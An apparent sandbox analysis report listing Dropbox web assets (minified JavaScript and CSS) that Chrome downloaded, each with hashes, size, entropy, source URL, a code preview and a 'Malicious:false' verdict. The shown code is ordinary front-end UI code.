                                                    SHA1:CFE780322D9DA7493229860D0E1ABA56F5408444
                                                    SHA-256:3F2F716BE6AA580A097040DD234C0A9DBF64DE94D52768052FC9CCF6C186F3DE
                                                    SHA-512:8C705EB6948B3D94E083C18939CC438D7A690C17D31F73D7078CF4CF9D39DE759DC0B309D63D649956CD0168620B5FFE9A0EE263B229E36385D8924CDB7D7E7E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_core_riviera_transcripts-vflKv4bsH.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./c_pap-events_sign_save_signature_doc","./c_core_data_ui","./c_preview_audio_video_video_editing_strings","react","./c_ts_utils","./e_data_modules_stormcrow","./c_core_utils_is_text_preview_on","./c_react-redux_hooks_useDispatch","./c_dig-components_skeleton_index","./c_file_viewer_api_navigation","./c_lodash"],(function(e,t,i,a,r,n,o,s,l,d,u,c,p,_){"use strict";function v(e){return e&&e.__esModule?e:{default:e}}var g=v(o);const w=i.fileViewerAtom(1),f=i.fileViewerAtom(!1),m=i.atom((e=>({volume:e(w),muted:e(f)})));const E=i.atom({}),h=["en","en_GB","da_DK","de","es","es_ES","fr","id","it","ja","ko","ms","nb_NO","nl_NL","pl","pt_BR","ru","sv_SE","th_TH","uk_UA","zh_CN","zh_TW"],y=["English (United States)","English (United Kingdom)","Danish (Denmark)","German (Germany)","Spanish (Latin America)","Spanish (Spain / Iberian)","French (France)","Indonesian (Indonesia)","Italian (Italy)","Japanese","Korean","Malay (Malays
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (830)
                                                    Category:downloaded
                                                    Size (bytes):831
                                                    Entropy (8bit):4.929291155076852
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D2C1CAEAF7D185B462A8D64FD0475932
                                                    SHA1:C9E3EA63E9D3AC4FACC19BBB69A05D1A3076C51F
                                                    SHA-256:005ED820758D4C12BEFDF1A3B2E9C30A0FA544038AF790FCC602AF1E3B63A4D1
                                                    SHA-512:B479521B2AB44FF8DB425EE99E4E0A9894FCDDD85550000D657FEB4C30266B8DEBC52416FE2EF1CF497EBD6C1ECF886752C160AA0177C769A492E68560122CD8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css
                                                    Preview:@keyframes alt-snackbarload{0%{bottom:-28px}100%{bottom:0}}.snackbar-layer{left:var(--maestro-left-nav-width, 240px);right:280px;padding:var(--spacing__base_unit)}@media only screen and (max-width: 1024px){.snackbar-layer{right:0}}@media only screen and (max-width: 735px){.snackbar-layer{left:0}}.snackbar-layer .snackbar-progress-bar{position:absolute;left:0;right:0;bottom:0}.snackbar-layer input{color:var(--color__inverse__standard__text)}.snackbar-layer-entire-page{width:100%}.snackbar-layer,.snackbar-layer-entire-page{position:fixed;display:flex;justify-content:center;bottom:0;pointer-events:none}.snackbar-layer *,.snackbar-layer-entire-page *{pointer-events:auto}.snackbar-layer>*,.snackbar-layer-entire-page>*{flex-grow:1}.snackbar-entire-page-container{margin:0 var(--spacing__base_unit) 0 var(--spacing__base_unit)}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (47128)
                                                    Category:downloaded
                                                    Size (bytes):47235
                                                    Entropy (8bit):5.32826075714181
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CC1D58B8E55F608A492E28BA84CA444C
                                                    SHA1:67EC781C267ED3B8AD6A3271D6D3678DFA67BAD0
                                                    SHA-256:39C0E556726910DE269FE7053E832EDF1339A7365299EB69BACEDCEA0F6FBBC8
                                                    SHA-512:28E16C86C1C705DB9AB24E5A8917F569C1D17A6A41417EADF9F383C93F4912EA086C394AB700517CD320A00CA9211A2BD5FA6EBB8986418C328F2384F1B05415
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_views_copy_link_mini_modal_copy_link_mini_modal.after-display-vflzB1YuO.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_pap-events_docsend_view_docsend_hub_entry_button","./e_data_modules_stormcrow","./c_core_i18n","./c_components_sharing_spinner","./c_dig-icons_assets_ui-icon_line_rewind","./c_react-use_useEffectOnce","./c_dig-icons_assets_ui-icon_line_lock","./c_dig-icons_assets_ui-icon_line_passwords","./c_stormcrow_stormcrow_exposure_logger","./c_datatypes_sharing_account-metadata","./c_lodash","./c_shared_with_redux_store","./c_sharing_sharing_pap_logging_create_shared_link_util","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_ts_utils","./e_edison","./c_src_sink_index","./c_sharing_low_distraction_view_gating_utils","./c_sharing_async_share_modal_util","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","metaserver/static/js/langpack","./c_reduxjs_toolkit_redux-toolkit","./c_react-
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (347)
                                                    Category:dropped
                                                    Size (bytes):400
                                                    Entropy (8bit):4.901536341453024
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4227ABAAAA0BFB80C0B211D2D9E3130C
                                                    SHA1:86452A3FD7F43ABA74A11A56541179B02E58654C
                                                    SHA-256:F46E3F5A8E726E59BB11E2EBC15AD08B33C29BB4BDA4C467194C66CDF289984F
                                                    SHA-512:776349CCE127EF967062CFFDBF28E47142BC216D1793AC06C680F502B222FF362CBD5E51C9BE4018210356CBCDB01776098D2DE8719B8791F46AADFB66A94422
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_ts_utils"],(function(e,t,i){"use strict";e.getActiveUser=function(){const e=i.getActiveUserId();if(e)return t.DeprecatedViewer.get_viewer().get_user_by_id(e)},e.mustGetActiveUser=function(){const e=i.mustGetActiveUserId();return t.DeprecatedViewer.get_viewer().get_user_by_id(e)}}));.//# sourceMappingURL=c_active_user.js-vfluKQxPO.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (417)
                                                    Category:dropped
                                                    Size (bytes):488
                                                    Entropy (8bit):4.8840583474125125
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B3BB1848BA3C91B724C84B8AECE4E2D4
                                                    SHA1:140092B43C4545299B394F0E22711A1476DEA83D
                                                    SHA-256:ECBC0EA518A6C9B72A87186CE938DCDAB5426F110B4FE26CAEC8764C9804B53C
                                                    SHA-512:34017F9120717C36D373BE964FC84E77FFF52D83AD5A2BA9DEFE0B8564F62F066144A0B601AF0FC0302CE2C276C198F52D690E0D13866C7D9D284DE766AC7080
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(t,e,n){"use strict";function c(t=e.ReactReduxContext){const c=t===e.ReactReduxContext?e.useReduxContext:()=>n.useContext(t);return function(){const{store:t}=c();return t}}const o=c();function u(t=e.ReactReduxContext){const n=t===e.ReactReduxContext?o:c(t);return function(){return n().dispatch}}const s=u();t.useDispatch=s,t.useStore=o}));.//# sourceMappingURL=c_react-redux_hooks_useDispatch.js-vflTFOqwr.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2129)
                                                    Category:dropped
                                                    Size (bytes):2219
                                                    Entropy (8bit):5.247259650487426
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1B477C36BE8FCC4492B8EC17C46569B6
                                                    SHA1:C907032179E7233CE655C753E3DC22EBBC8E44EB
                                                    SHA-256:0F6F88FD7E3F7ECF449DAF68EA30B4525FF616BD4C63A40E372D1D5090412BC1
                                                    SHA-512:377D762B49D559CD6C7F163387A0F1E1012A38939ABC5DE441C47B4C689FC68EC9EEB90487E28054465144F1167DECC0F5BB46BD72498012301246B0D3DB95B5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_dig-illustrations_hero_remote-work","./c_core_i18n"],(function(e,t,l,o,a){"use strict";function n(e){return e&&e.__esModule?e:{default:e}}var r=n(t);const i="dbx_previews_log_out_download_modal";e.PostDownloadPreSUSIModal=e=>{const n=t=>{e.onClose(),e.handleOpenSUSIModal(t),l.defaultEmitter$1.select(l.ON_POST_DOWNLOAD_PRE_SUSI_MODAL_OPEN_SUSI_MODAL).emit(null)};return t.useEffect((()=>{l.defaultEmitter$1.select(l.ON_VIEW_POST_DOWNLOAD_PRE_SUSI_MODAL).emit(null)}),[]),r.default.createElement(l.Modal,{open:e.isOpen,isCentered:!0,onRequestClose:e.onClose},r.default.createElement(l.Modal.Header,{hasBottomSpacing:"title-standard",className:"naming-conventions__header"},r.default.createElement(o.RemoteWorkHero,{aspectRatio:"16:9"})),r.default.createElement(l.Modal.Body,null,r.default.createElement(l.Title,null,e.isFolder?l.formatPostDownloadModalTitleFolderText(a.intl):l.formatPostDownloadModalTitleFileText(a.intl)),r.de
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1973)
                                                    Category:downloaded
                                                    Size (bytes):2054
                                                    Entropy (8bit):4.935624790828277
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EE5B45EE789326A74D317282E29F0F1A
                                                    SHA1:2348AE41C14B874715F861C920531C64C7980D23
                                                    SHA-256:A90963778E5792732118822D08142078F38C4CBDC6BF51632F7836E8D2CB7722
                                                    SHA-512:F9C32A4C5F2DEB6BCE83D6160820F2CC38158F16A6A57D8A4B3CF0A11BACF65011833BCD28F284C2A312D95128B581F2CF1E4BB3E3FD3C72330E1D880919764B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_signature-vfl7ltF7n.js
                                                    Preview:define(["exports","react"],(function(e,c){"use strict";function t(e){if(e&&e.__esModule)return e;var c=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var l=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(c,t,l.get?l:{enumerable:!0,get:function(){return e[t]}})}})),c.default=e,Object.freeze(c)}var l=t(c);e.SignatureLine=e=>l.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},l.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8.852 8.937v7.523l-2.438 3.6-2.439-3.6V6.147c0-.59.248-1.147.678-1.552.428-.403.998-.62 1.582-.62h.353a2.267 2.267 0 0 1 1.589.623c.428.404.675.96.675 1.549v1.29h3.288v4.582h-1.5V8.937H8.852Zm-2.25-3.462a.767.767 0 0 1 .539.207l.005.005a.63.63 0 0 1 .206.46v1.29H5.475v-1.29a.63.63 0 0 1 .206-.46.808.808 0 0 1 .554-.212h.367ZM5.475 8.937V16l.939 1.385L7.352 16V8.937H5.475Zm9.618 6.613c-.213.074-.528.248-.94.549-.475.347-.997.802-1.52 1.289-.449.418-.886.848-1.284 1.24l-.188.184c-.43.423-.836.817-1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (723)
                                                    Category:downloaded
                                                    Size (bytes):788
                                                    Entropy (8bit):5.506306666122792
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:27D299D83954E3AD9751E41F54012CD0
                                                    SHA1:34F34FE731D90EE4A8FE2EB578DA44DA5BFBA244
                                                    SHA-256:CDB7729E58098E0F467B37E6F56F4CAB467DF36ECC2764E6DE1F6A72C0B1BD3F
                                                    SHA-512:F8F97CFDECB67E40344278BCE8256B5A88C5EF5028982F9215E4B7288B3393A899DF448BBDCD82B01A1A032410DF8CC8DC13CE23E750CFE08C020783D4006F0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_src_common_format_bytes-vflJ9KZ2D.js
                                                    Preview:define(["exports"],(function(e){"use strict";e.formatBytes=function(e,a,t=2,s=!0,r=!0,o=!0){a=o?parseFloat(a):Math.max(0,parseFloat(a));const i=Math.abs(a);let f,m;return i<1024?(t=0,f=a,m=e.formatMessage({id:"se/5fs",defaultMessage:"{count, plural, one{byte} other{bytes}}"},{count:a}),s=!0):i<921600?(f=a/1024,m=e.formatMessage({id:"fcOrPH",defaultMessage:"KB"})):i<943718400?(f=a/1048576,m=e.formatMessage({id:"UFZYVH",defaultMessage:"MB"})):i<966367641600||0===t&&a<1099511627776?(f=a/1073741824,m=e.formatMessage({id:"5nCO1R",defaultMessage:"GB"})):(f=a/1099511627776,m=e.formatMessage({id:"4rrpQj",defaultMessage:"TB"})),`${e.formatNumber(f,{maximumFractionDigits:t,minimumFractionDigits:r?0:t})}${s?" ":""}${m}`}}));.//# sourceMappingURL=c_src_common_format_bytes.js-vflSCU1Y1.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1651)
                                                    Category:dropped
                                                    Size (bytes):1716
                                                    Entropy (8bit):5.425986360097725
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CDEE11346AD9FD69A66B640DFAD8888D
                                                    SHA1:0810FB42C4DA293F7539BC4E9588BF1AFC36B66F
                                                    SHA-256:00FC622F0ADF77A2421DAC874408FD3C4176DA289B77CBEDD88BF038604906C0
                                                    SHA-512:EAECDAC79D053CDAD18DABDD2FAB78688115F6B18ADF88D8700E5C4CB286C319E7CFF0B6FC4BF120D08F75A9E1D11BB2650D1DB267EBD539EA2952397B1C09F1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var r=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,r.get?r:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var r=l(t);e.AudioLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"m6 14 .01-3 1.5.015-.01 3L6 14Zm12 0v-3h1.5v3H18Zm-6 2V9h1.5v7H12Zm-3 4V4h1.5v16H9Zm6-2.5V7h1.5v10.5H15Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.CollapseRightLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M17.91 3.95v16h1.5v-16h-1.5Zm-7.15 13.857 5.432-5.832-1.024-.953-4.527-4.763-1.087 1.034 3.814 4.012H4.625v1.5h8.744l-3.707 3.98 1.098 1.022Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.FssGlyph=e=>r.createElement("s
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1244)
                                                    Category:dropped
                                                    Size (bytes):1327
                                                    Entropy (8bit):4.9121090221213315
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6A0C3BD9E4095E56DA482A4FB108E719
                                                    SHA1:0DF352BD1EFAD40474E7F018443762CC236E3497
                                                    SHA-256:BF69CA40E02C8F68E12B55FF63D45C234E9B1FB876E785E58E3EBEFDB9594DD7
                                                    SHA-512:ADAA25DE9350BEB8E586A1BFC8C0DEEE883AA74FDCBDEDAEDA8FB8BE69AF3C454DDE031F268E2455B593B7A2205DAE42270CE5BB32975D5BD8A3312B10D70012
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_ts_utils","./e_file_viewer_static_scl_page_folder","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_src_sink_index","./c_components_title-bar_title_bar","./c_lodash","./c_core_i18n","metaserver/static/js/langpack","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,o,t,n,i,r,l,_,a,c,s,d,u,p,B,F,k,g,C){"use strict";e.CopyLinkButton=r.CopyLinkButton,e.CopyToDropboxButton=r.CopyToDropboxButton,e.DownloadFolderActionBarButtonContainer=r.DownloadFolderActionBarButtonContainer,e.FolderActionBar=r.FolderActionBar,e.FolderBody=r.FolderBody,e.FolderTitle=r.FolderTitle,e.HelpMenu=r.HelpMenu,e.JoinFolderActionButtonContainer=r.JoinFolderActionButtonContainer,e.LoginButton=r.LoginButton,e.RequestAccessModal=r.Reque
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2315)
                                                    Category:dropped
                                                    Size (bytes):231739
                                                    Entropy (8bit):5.552830449229439
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EA8F070B581283F3B290E74D43BFE84B
                                                    SHA1:E3D812AC289888DDBE9B4B9B0A17B14CE11BE040
                                                    SHA-256:192A8F25137A765BCEAFF471B07C220D77BAFCAA8D0E25728760B790229675B1
                                                    SHA-512:25CBCF6EEADD4F071EE8DF446887B7441DBA554C485D1262B61939ECDB8500C6786369656902E5BE14E1EDCE50B94EBDC7269151683D03238DAE97392A6A0901
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x21220000, 0x705, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1371)
                                                    Category:downloaded
                                                    Size (bytes):1469
                                                    Entropy (8bit):5.125817232734411
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FD52D408EC18B2354653B4F1C110DCE4
                                                    SHA1:083D563B4CB1AF0C5C2156E6B75225989E007585
                                                    SHA-256:0984227E9576F200BD847481C5931FB389539E3A591DA02E2423139EC46F8258
                                                    SHA-512:7D71DEB54EBD5743FE32946B15C35C4249BEC21C401813FDAFD1068963B0FD57D1EEBEB9655E9CBF9D4D12084778FCBFBEE483AB8BA8175CB9FF493F61A50F3A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_react_query_helpers_queries_login_and_register_constants-vfl_VLUCO.js
                                                    Preview:define(["exports","./e_data_modules_stormcrow","./e_edison","./c_ts_utils","./c_api_v2_routes_folders_info_provider"],(function(e,t,n,r,s){"use strict";class a extends r.Message{constructor(e){super(),this.redirectWindowToken="",this.funcaptchaPublicKey="",this.funcaptchaRegisterPublicKey="",this.funcaptchaPaymentPublicKey="",r.proto3.util.initPartial(e,this)}static fromBinary(e,t){return(new a).fromBinary(e,t)}static fromJson(e,t){return(new a).fromJson(e,t)}static fromJsonString(e,t){return(new a).fromJsonString(e,t)}static equals(e,t){return r.proto3.util.equals(a,e,t)}}a.runtime=r.proto3,a.typeName="abuse.LoginAndRegisterConstants",a.fields=r.proto3.util.newFieldList((()=>[{no:1,name:"redirect_window_token",kind:"scalar",T:9},{no:2,name:"funcaptcha_public_key",kind:"scalar",T:9},{no:3,name:"funcaptcha_register_public_key",kind:"scalar",T:9},{no:4,name:"funcaptcha_payment_public_key",kind:"scalar",T:9}]));const i={typeName:"abuse.LoginAndRegisterPrefetchService",methods:{fetchConsta
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1516)
                                                    Category:dropped
                                                    Size (bytes):1593
                                                    Entropy (8bit):5.282742550392631
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5C35F1EB4602BB3E722011F971023C06
                                                    SHA1:5C8FCF4CCAF1E6D3682C46B0D743938F44843C81
                                                    SHA-256:1F6B1C2A16EF6CD1AF39BA9999A89140A1ACAC48A7A00756A981B936315D284B
                                                    SHA-512:3BB1F6AC39E6786E96E6BEDB1C4A6790BCF2C84A0EF91AE017206B2E00849D5509607B9A1A1452FB03BE80F854671DB2A20B5EDC48C82252919BA6A65568B010
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.ShowLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 9.5A2.321 2.321 0 0 0 9.5 12a2.321 2.321 0 0 0 2.5 2.5 2.32 2.32 0 0 0 2.5-2.5A2.322 2.322 0 0 0 12 9.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M20.177 11.678C20.067 11.446 17.41 6 12 6c-5.412 0-8.067 5.446-8.177 5.678L3.669 12l.153.322C3.933 12.554 6.588 18 12 18c5.411 0 8.066-5.446 8.177-5.678L20.33 12l-.154-.322ZM12 16.5c-3.77 0-6.03-3.42-6.65-4.5.62-1.081 2.878-4.5 6.65-4.5 3.771 0 6.028 3.418 6.65 4.5-.622 1.082-2.88 4.5-6.65 4.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (584)
                                                    Category:downloaded
                                                    Size (bytes):669
                                                    Entropy (8bit):4.996657140737536
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:55855BBBB8D945E9C6DD5C5BCEFA4200
                                                    SHA1:F948F6BF56C8F1F1D1AF0A7EBC0EDD2685BB318C
                                                    SHA-256:B934F4536D13AD631FCB1E92461455FE013BDF99D844A26A81925D18032F88E5
                                                    SHA-512:331BD8E90D9B6EE318CB0C10B604826D7164980C917040C971C3FDA6D5AC5A2EBCA47A52D246BB5894B3F1FD7946D5CB6866EDD5B0D086C5A026FC0A63CE87F6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_action_plugins_titlebar_button2-vflVYVbu7.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(t,i){"use strict";i.injectInternalStyle("/static/metaserver/static/js/file_viewer/action_plugins/titlebar_button.module.out-vflqh5E5W.css",(t=>"._icon-button_1xcdf_1{line-height:normal;padding:0 var(--dig-spacing__micro__small)}._button-container_1xcdf_6{display:inline-block;position:relative}._notification-button-dot_1xcdf_11{position:absolute;right:4px;top:4px}"));t.buttonContainer="_button-container_1xcdf_6",t.iconButton="_icon-button_1xcdf_1",t.notificationButtonDot="_notification-button-dot_1xcdf_11"}));.//# sourceMappingURL=c_file_viewer_action_plugins_titlebar_button2.js-vflYvi5oo.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (745)
                                                    Category:downloaded
                                                    Size (bytes):816
                                                    Entropy (8bit):5.175398773464321
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0EC5092D45DF3411DF1A8295EE377A48
                                                    SHA1:95E36A1E4FE72511AA757952A22FE8222A7EEB6C
                                                    SHA-256:B487A1AA809552D23F80FE9EEEF5212BEC1D9DF507818C7302B0BF9C4DB8B366
                                                    SHA-512:6720D0BE1495D7E3A8E87B2CDA2138D1A19200A7316329F0F46DFF5D22F6029D804AC40F6D9A4F3D7F68B91B3F55CE6135A113F9B8D61BCB9ECCE91BB3BF51B0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_loading_indicator-vflDsUJLU.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder"],(function(e,t,i,n){"use strict";function a(e){return e&&e.__esModule?e:{default:e}}var o=a(t);n.injectInternalStyle("/static/js/file_viewer/loading_indicator/loading_indicator.module.out-vfloa_x0q.css",(e=>"._loadingContent_pg8hi_1{align-items:center;display:flex;flex:1;justify-content:center}@media (max-width:600px){._loadingContent_pg8hi_1{width:100%!important}}"));const l=({})=>{const e=i.useIntl();return o.default.createElement("div",{className:"_loadingContent_pg8hi_1"},o.default.createElement(n.Spinner,{"aria-label":e.formatMessage({id:"zqXonC",defaultMessage:"Your preview is loading"})}))};l.displayName="LoadingIndicator",e.LoadingIndicator=l}));.//# sourceMappingURL=c_file_viewer_loading_indicator.js-vflOPBHD1.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1014)
                                                    Category:downloaded
                                                    Size (bytes):1073
                                                    Entropy (8bit):4.959186636362789
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6ED9E091C944EB6A991B91AD84D377B2
                                                    SHA1:B089CF51DE03AC18DB385E411A20BAF443A066BD
                                                    SHA-256:EC050D831893CACECCDD3CFAC65A5044D24E7CC8105FB4DC6D28EB08E0631B03
                                                    SHA-512:438148EC1137A12B892677A79F4D93C869C8FC8E1C8AF9F53829AEE8F6DB45D7761BFE7FE12D6F666F4DE333E89E73A681845B3240650632C84DC581DCAA3E70
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flows_redux_store-vflbtngkc.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_flows_redux_reducer","./c_tagging_data_store","./c_lodash","react","./c_core_i18n","./e_core_exception","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_flows_constants","./c_tagging_utils","./c_browse_models","./c_search_search_helpers","./c_plugin_utils_getImageDefaultSizes","./c_sync_everything_redux_store","./c_sync_everything_redux_types"],(function(e,_,t,s,r,c,o,n,i,a,d,g,u,l,m,p,f,v,h,w,y,A,x,S,b,E,R){"use strict";const T={[_.AUTOMATIONS_NAMESPACE_KEY]:t.AutomationsReducer},j=r.once((()=>{const e=_.getStoreAndRegisterReducers(T);return s.getStoreForTagging(),e}));e.getStoreForAut
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5261)
                                                    Category:dropped
                                                    Size (bytes):5318
                                                    Entropy (8bit):5.172646337663064
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8575DD48DC885F70F304E27926BA11A2
                                                    SHA1:92927F8F80809FD6BE88DAF96D46C86404ECF088
                                                    SHA-256:34B9CACC9B2B3A7FD4CE8BB782E4CB1F29D9DCF3EBE5CD8EBCE328CE37942004
                                                    SHA-512:21E09A99C919A6D3543FFF27791313F2943495C6091C59C858B24318F88EA3FF966770A90DFF5874012B7B21C66E7245DAD50D988FA05433FAE0A7A0E8335325
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_ui_overlay","./c_lodash"],(function(t,e,s,o,i){"use strict";function n(t){return t&&t.__esModule?t:{default:t}}var r=n(s);const a={[o.StickyPosition.TOP]:"top",[o.StickyPosition.BOTTOM]:"bottom",[o.StickyPosition.LEFT]:"left",[o.StickyPosition.RIGHT]:"right",[o.StickyPosition.BOTTOM_ALIGN_RIGHT]:"bottom-align-right",[o.StickyPosition.BOTTOM_ALIGN_LEFT]:"bottom-align-left",[o.StickyPosition.TOP_ALIGN_RIGHT]:"top-align-right",[o.StickyPosition.TOP_ALIGN_LEFT]:"top-align-left"};class l extends r.default.Component{constructor(t){super(t),this.titleBubbleContainer=null,this.arrow=null,this._getTargetNode=()=>{if(this.titleBubbleContainer&&this.titleBubbleContainer.children.length>0){const t=this.titleBubbleContainer.children[0];if("NOSCRIPT"!==t.tagName){const e=this.titleBubbleContainer.getElementsByClassName("titleBubble-positioningTarget")[0]||t;return this.props.shouldReadContents&&t.setAttribute("aria-describedby",
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1255)
                                                    Category:dropped
                                                    Size (bytes):1324
